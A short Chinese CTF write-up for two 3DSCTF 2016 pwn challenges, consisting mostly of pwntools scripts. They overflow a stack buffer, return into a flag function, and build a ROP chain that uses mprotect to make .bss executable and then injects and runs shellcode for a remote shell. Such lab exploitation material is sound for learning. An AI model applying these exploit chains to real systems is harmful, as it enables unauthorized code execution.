get_started_3dsctf_2016
直接调用if里面的函数,但是本地可以通,远程却打不通
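from pwn import *

# Local run; the remote variant is kept from the original script as a comment.
# r = remote('node3.buuoj.cn', 25775)
r = process('./get_started_3dsctf_2016')

# Address of the in-binary function the writeup refers to as get_flag.
# The value comes from the writeup itself; it is not derived here.
get_flag = 0x80489b8

# Plain return-to-text: 0x38 bytes of filler reach the saved return address,
# which is then replaced by get_flag's address. A bytes literal is used so the
# concatenation with p32() (which returns bytes) also works on Python 3; the
# original str literal raises TypeError there. A stack canary or PIE in the
# target would each break this step.
payload = b'a' * 0x38 + p32(get_flag)

r.sendline(payload)
r.interactive()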
不过程序里面有mprotect函数,它可以修改程序内存里面的权限
int mprotect(const void *start, size_t len, int prot); # start 是要修改的起始内存地址；len 是修改的长度；prot 是修改后的权限
可以利用mprotect函数修改bss段的权限,让其有执行权限,再用read写入shellcode,然后跳转到bss段执行来getshell
详情步骤参考这里
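from pwn import *

context(arch='i386', os='linux')
r = remote('node3.buuoj.cn', 25775)
elf = ELF('./get_started_3dsctf_2016')

# The binary itself carries mprotect and read, so their addresses are read
# straight from its symbol table (the writeup relies on this; see its note
# that the program contains mprotect).
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']

# Gadget used to discard three arguments after each call; by its name this
# is presumably a pop; pop; pop; ret sequence -- address taken from the
# writeup, not verified here.
ppp3_addr = 0x080483b8

# mprotect(start, len, prot) over one page of the .bss region the writeup
# identifies; 7 == PROT_READ | PROT_WRITE | PROT_EXEC.
mpr_start = 0x80eb000
mpr_len = 0x1000
mpr_prot = 7  # rwx == 7

shellcode = asm(shellcraft.sh())

# ROP chain after 0x38 bytes of filler (bytes literal so str/bytes mixing
# does not break on Python 3):
#   1. mprotect(mpr_start, mpr_len, 7)    -> make the page executable
#   2. read(0, mpr_start, len(shellcode)) -> receive the second sendline there
#   3. return into mpr_start              -> execute it
# ppp3_addr follows each call so its three arguments are popped before the
# next return. The whole approach depends on the target granting an rwx
# mapping; W^X enforcement or a seccomp policy rejecting PROT_EXEC on
# mprotect would stop it at step 1.
payload = b'a' * 0x38
payload += p32(mprotect_addr) + p32(ppp3_addr) + p32(mpr_start) + p32(mpr_len) + p32(mpr_prot)
payload += p32(read_addr) + p32(ppp3_addr) + p32(0x0) + p32(mpr_start) + p32(len(shellcode))
payload += p32(mpr_start)

r.sendline(payload)
r.sendline(shellcode)
r.interactive()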
not_the_same_3dsctf_2016
一样的配方,参数不一样
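from pwn import *

context(arch='i386', os='linux')
r = remote('node3.buuoj.cn', 28393)
elf = ELF('./not_the_same_3dsctf_2016')

# Same recipe as the previous challenge: read and mprotect are resolved from
# the binary's own symbol table.
read_addr = elf.symbols['read']
mprotect_addr = elf.symbols['mprotect']

# Three-pop gadget used to clean each call's arguments off the stack; the
# name suggests pop; pop; pop; ret -- address taken from the writeup.
ppp3_ret = 0x080483b8

# One page of the .bss region named by the writeup, made rwx (7).
mpr_start = 0x080eb000
mpr_len = 0x1000
mpr_prot = 7  # rwx == 7

shellcode = asm(shellcraft.sh())

# Only the filler length (0x2d) differs from the previous script. Bytes
# literal so the str/bytes concatenation also works on Python 3.
#   1. mprotect(mpr_start, mpr_len, 7)
#   2. read(0, mpr_start, len(shellcode))
#   3. return into mpr_start
# As before, an rwx mprotect being allowed is the precondition; W^X or a
# seccomp filter on PROT_EXEC would block step 1.
payload = b'a' * 0x2d
payload += p32(mprotect_addr) + p32(ppp3_ret) + p32(mpr_start) + p32(mpr_len) + p32(mpr_prot)
payload += p32(read_addr) + p32(ppp3_ret) + p32(0x0) + p32(mpr_start) + p32(len(shellcode))
payload += p32(mpr_start)

r.sendline(payload)
r.sendline(shellcode)
r.interactive()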